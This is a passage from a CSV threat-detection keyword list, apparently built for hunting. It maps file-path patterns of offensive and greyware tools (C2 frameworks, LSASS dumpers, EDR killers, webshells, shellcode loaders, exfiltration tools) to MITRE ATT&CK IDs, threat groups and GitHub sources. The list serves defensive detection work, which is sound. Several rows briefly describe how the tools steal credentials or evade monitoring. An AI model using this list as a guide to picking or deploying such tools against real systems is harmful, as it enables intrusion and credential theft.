- TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*\SharpDoor.cs*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*\SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*\SharpExfiltrate\*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*\SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*\SharpHoundCommon\*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*\SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*\SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*\SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*\SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*\SharpTerminator.csproj*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*\SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*\shellcode_loader.dll*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*\shellcode_samples\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\sherlock.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\Shhmon.*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*\Siber Systems\GoodSync\*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*\SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*\SilentProcessExit.sln*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\SillyRAT\*.py","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\sitadel.log*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*\slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\SMB_RPC\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*\sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\SoftPerfect Network Scanner*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*\spacerunner.exe*","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\spellbound-main*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*\spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*\spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*\spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\SpoofCmdLine\TheThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\SprayAD.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*\SprayAD.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*\SQLInfoDumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\SQLRecon*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*\stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*\start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*\StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*\StolenPasswords.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\Suborner.sln*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*\Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*\Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\Supershell\rssh\pkg\*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*\system32.zip*","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\systemic.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*\TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*\TASKSHELL.EXE*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" +"*\teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*\teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*\Temp\*\ntds.dit*","greyware_tool_keyword","wmic","The NTDS.dit file is the heart of Active Directory including user accounts If it's found in the Temp directory it could indicate that an attacker has copied the file here in an attempt to extract sensitive information.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Temp\*\ntds.jfm*","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in the Temp directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\TEMP\AteraUpgradeAgentPackage\*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\temp\dump.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Temp\dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\temp\hollow.dll*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*\temp\pwned.trx*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 